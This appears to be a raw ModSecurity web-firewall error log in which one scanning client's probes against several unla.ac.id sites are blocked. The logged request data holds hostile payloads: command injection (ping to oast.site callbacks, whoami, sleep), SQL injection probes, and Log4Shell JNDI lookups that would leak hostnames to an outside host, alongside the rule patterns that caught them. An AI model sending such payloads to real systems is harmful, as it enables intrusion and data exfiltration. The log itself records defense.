[Tue Aug 29 11:33:24.342133 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgtmeq6ymkaoh7m.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARQ39sAAAAB"]
[Tue Aug 29 11:33:24.365659 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARo8yAAAAAT"]
[Tue Aug 29 11:33:24.379170 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlg4jrcik61udrmi.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARfwksAAAAI"]
[Tue Aug 29 11:33:25.309126 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARo8yEAAAAT"]
[Tue Aug 29 11:33:25.315535 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARdiJEAAAAK"]
[Tue Aug 29 11:33:25.319456 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAAQKOkEAAAAs"]
[Tue Aug 29 11:33:25.341201 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARpgywAAAAU"]
[Tue Aug 29 11:33:25.348686 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARy-tEAAAAb"]
[Tue Aug 29 11:33:25.352794 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARfwk0AAAAI"]
[Tue Aug 29 11:33:25.353221 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAAQKOkIAAAAs"]
[Tue Aug 29 11:33:25.355262 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARt-8oAAAAV"]
[Tue Aug 29 11:33:25.356283 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARzXx4AAAAd"]
[Tue Aug 29 11:33:25.362096 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARo8yMAAAAT"]
[Tue Aug 29 11:33:25.368901 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARjjMIAAAAL"]
[Tue Aug 29 11:33:25.373101 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARiDm4AAAAJ"]
[Tue Aug 29 11:33:25.374911 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARu2rkAAAAW"]
[Tue Aug 29 11:33:26.397009 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARA7gEAAAAA"]
[Tue Aug 29 11:33:26.408767 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgikh5hj88qs6yb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARy-tMAAAAb"]
[Tue Aug 29 11:33:26.441148 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARdiJQAAAAK"]
[Tue Aug 29 11:33:26.443687 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAARLXwMAAAAQ"]
[Tue Aug 29 11:33:26.444381 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARy-tQAAAAb"]
[Tue Aug 29 11:33:26.445228 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARo8yUAAAAT"]
[Tue Aug 29 11:33:26.463903 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARy-tUAAAAb"]
[Tue Aug 29 11:33:26.469719 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARdiJUAAAAK"]
[Tue Aug 29 11:33:26.480096 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARjjMUAAAAL"]
[Tue Aug 29 11:33:26.486794 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlg4baax9qor1zuf.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAAOJKdQAAAAE"]
[Tue Aug 29 11:33:26.489058 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FsCo-f0AAARLXwUAAAAQ"]
[Tue Aug 29 11:33:26.498035 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgci9jiwf51ah5g.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARt-88AAAAV"]
[Tue Aug 29 11:33:26.500858 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgyx19wzq5dmpwn.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARTEOgAAAAG"]
